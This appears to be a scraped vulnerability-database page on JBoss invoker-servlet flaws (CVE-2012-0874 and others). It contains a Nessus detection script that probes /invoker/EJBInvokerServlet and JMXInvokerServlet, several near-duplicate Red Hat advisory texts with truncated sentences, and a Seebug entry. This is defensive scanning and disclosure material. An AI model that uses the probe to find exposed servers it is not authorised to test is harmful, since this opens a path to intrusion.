  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_application_platform");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:jboss:jboss_application_server");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:workspace_streaming");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 9111, 8080, 9832);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Identify possible ports.
#
# - web servers.
ports = get_kb_list("Services/www");
if (isnull(ports)) ports = make_list();
# - ports for McAfee Web Reporter and Symantec Workspace Streaming.
foreach p (make_list(8080, 9111, 9832))
{
  if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p);
}

# Check each port.
non_vuln = make_list();
foreach port (ports)
{
  vuln_urls = make_list();
  foreach page (make_list("/EJBInvokerServlet", "/JMXInvokerServlet"))
  {
    url = "/invoker" + page;
    res = http_send_recv3(
      method   : "GET",
      item     : url,
      port     : port,
      fetch404 : TRUE
    );
    if (
      !isnull(res) &&
      "org.jboss.invocation.MarshalledValue" >< res[2] &&
      (
        'WWW-Authenticate: Basic realm="JBoss HTTP Invoker"' >!< res[1] ||
        "404 Not Found" >!< res[1]
      )
    ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port));
  }

  if (max_index(vuln_urls) > 0)
  {
    if (max_index(vuln_urls) > 1) request = "URLs";
    else request = "URL";

    if (report_verbosity > 0)
    {
      report =
        '\n' +'Nessus was able to verify the issue exists using the following '+
        '\n' + request + ' :' +
        '\n' +
        '\n' + join(vuln_urls, sep:'\n') +
        '\n';
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
  }
  else non_vuln = make_list(non_vuln, port);
}

if (max_index(non_vuln) == 1)
  exit(0, "The web server tested on port " + port + " is not affected.");
else if (max_index(non_vuln) > 1)
  exit(0, "None of the ports tested (" +join(non_vuln, sep:", ")+ ") contain web servers that are affected.");
NASL family: Red Hat Local Security Checks
NASL id: REDHAT-RHSA-2013-0193.NASL
description:

Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/

An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)

JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)

Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)

Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)

When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending

last seen: 2020-03-20
modified: 2013-01-24
plugin id: 64080
published: 2013-01-24
reporter: This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/64080
title: RHEL 4 : JBoss EAP (RHSA-2013:0193)

NASL family: Red Hat Local Security Checks
NASL id: REDHAT-RHSA-2013-0195.NASL
description:

Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

This JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/

An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)

JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)

Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)

Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)

When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending

last seen: 2020-03-20
modified: 2014-11-08
plugin id: 78945
published: 2014-11-08
reporter: This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/78945
title: RHEL 6 : JBoss EWP (RHSA-2013:0195)

NASL family: Red Hat Local Security Checks
NASL id: REDHAT-RHSA-2013-0191.NASL
description:

Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/

An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)

JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)

Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)

Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used.
A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL. (CVE-2012-3546) The JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908) An XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575) SecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370) Configuring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478) twiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066) NonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034) The JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. 
If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server. (CVE-2012-0874) The JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377) CallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369) Red Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat. last seen 2017-10-29 modified 2014-05-02 plugin id 64078 published 2013-01-24 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=64078 title RHEL 6 : JBoss EAP (RHSA-2013:0191) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0197.NASL description Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. 
As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-03-20 modified 2014-11-08 plugin id 78947 published 2014-11-08 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. 
source https://www.tenable.com/plugins/nessus/78947 title RHEL 4 : JBoss EWP (RHSA-2013:0197) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0196.NASL description Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. 
(CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator# authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-03-20 modified 2014-11-08 plugin id 78946 published 2014-11-08 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78946 title RHEL 5 : JBoss EWP (RHSA-2013:0196)
Seebug
bulletinFamily | exploit |
description | Bugtraq ID: 57552 CVE ID: CVE-2012-0874 JBoss is an open-source application server based on J2EE. Under certain configurations, unauthenticated access to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets is allowed. The security interceptor's second layer of authentication prevents direct exploitation of this vulnerability, but if the interceptor is misconfigured or improperly disabled, it can lead to arbitrary code execution. Affected products: Red Hat JBoss Enterprise Web Platform for RHEL 5 Server 5; Red Hat JBoss Enterprise Web Platform for RHEL 4ES 5; Red Hat JBoss Enterprise Web Platform for RHEL 4AS 5; Red Hat JBoss Enterprise Application Platform for RHEL 5 Server 5; Red Hat JBoss Enterprise Application Platform for RHEL 4ES 5; Red Hat JBoss Enterprise Application Platform for RHEL 4AS 5. Vendor solution: users can refer to the following vendor-provided security advisory for patch information: http://rhn.redhat.com/errata/RHSA-2013-0194.html |
id | SSV:60624 |
last seen | 2017-11-19 |
modified | 2013-02-03 |
published | 2013-02-03 |
reporter | Root |
title | JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities (CVE-2012-0874) |
References
- http://rhn.redhat.com/errata/RHSA-2013-0192.html
- http://rhn.redhat.com/errata/RHSA-2013-0194.html
- http://rhn.redhat.com/errata/RHSA-2013-0195.html
- http://www.securityfocus.com/bid/57552
- http://secunia.com/advisories/52054
- http://rhn.redhat.com/errata/RHSA-2013-0221.html
- http://securitytracker.com/id?1028042
- http://rhn.redhat.com/errata/RHSA-2013-0197.html
- http://rhn.redhat.com/errata/RHSA-2013-0196.html
- http://rhn.redhat.com/errata/RHSA-2013-0193.html
- http://rhn.redhat.com/errata/RHSA-2013-0198.html
- http://rhn.redhat.com/errata/RHSA-2013-0191.html
- https://bugzilla.redhat.com/show_bug.cgi?id=795645
- http://secunia.com/advisories/51984
- http://www.exploit-db.com/exploits/30211
- http://archives.neohapsis.com/archives/bugtraq/2013-12/0134.html
- http://rhn.redhat.com/errata/RHSA-2013-0533.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/81511